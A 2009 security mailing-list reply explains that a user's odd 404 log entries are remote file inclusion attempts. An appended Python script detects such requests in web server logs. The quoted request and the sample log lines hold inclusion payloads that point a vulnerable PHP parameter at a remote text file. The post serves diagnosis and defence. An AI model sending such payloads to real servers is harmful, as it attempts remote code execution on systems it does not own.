WebApp Sec: Re: 404 messages pointing to a strange location

Re: 404 messages pointing to a strange location

From: Daniel Clemens <daniel.clemens_at_packetninjas.net>
Date: Sat, 3 Jan 2009 12:45:13 -0600

On Jan 2, 2009, at 4:10 AM, Simon wrote:

> Hi all,
>
> Yesterday evening I had lots of 404-messages from my web server, all
> pointing to locations like
> http://foo.bar/something//ee_commerce/paypalcart.php?toroot=http://220.134.244.157/xoops/templates_c/id3.txt
> ?
> I don't use paypal or anything similar on my page; what does that
> mean?
>

Looks like a bug being exploited with file inclusion being rendered
back to your server.
I would look for other signs of compromise on your system as well as
what Tom Ritter posted.

| Daniel Uriah Clemens
| Packetninjas L.L.C | | http://www.packetninjas.net
| c. 205.567.6850 | | o. 866.267.8851
"The secret to creativity is knowing how to hide your sources" Einstein

Received on Jan 04 2009
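
A log check for the request pattern quoted in this thread, added here as an example and not part of the original messages: it flags requests whose query parameter value is a remote URL and separates the ones the server rejected (like the 404s reported) from the ones it answered, which are the first to review when looking for signs of compromise. The sample log lines, client and remote addresses, and the `page` parameter are constructed; the log layout is assumed to be Apache common/combined format.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample lines (not from the thread); addresses are documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2009:21:14:02 +0000] "GET /something//ee_commerce/paypalcart.php?toroot=http://203.0.113.9/id3.txt? HTTP/1.1" 404 209',
    '192.0.2.10 - - [01/Jan/2009:21:14:03 +0000] "GET /index.php?page=http%3A%2F%2F203.0.113.9%2Fid3.txt HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2009:21:15:40 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2009:21:15:41 +0000] "GET /missing.html HTTP/1.1" 404 209',
]

# client ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3}) ')
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def find_remote_url_params(lines):
    """Return (client, path, param, value, status) for every request whose
    query string passes a remote URL as a parameter value."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the assumed layout
        client, target, status = m.groups()
        path, _, query = target.partition('?')
        # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_RE.match(value):
                hits.append((client, path, name, value, int(status)))
    return hits


def triage(hits):
    """Split hits into rejected requests (4xx/5xx) and answered ones (2xx/3xx).
    An answered request is not proof of inclusion, only the place to look first."""
    rejected = [h for h in hits if h[4] >= 400]
    answered = [h for h in hits if h[4] < 400]
    return rejected, answered


if __name__ == "__main__":
    rejected, answered = triage(find_remote_url_params(SAMPLE_LOG))
    for label, group in (("rejected", rejected), ("REVIEW", answered)):
        for client, path, name, value, status in group:
            print(f"{label}: {client} {status} {path} {name}={value}")
```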
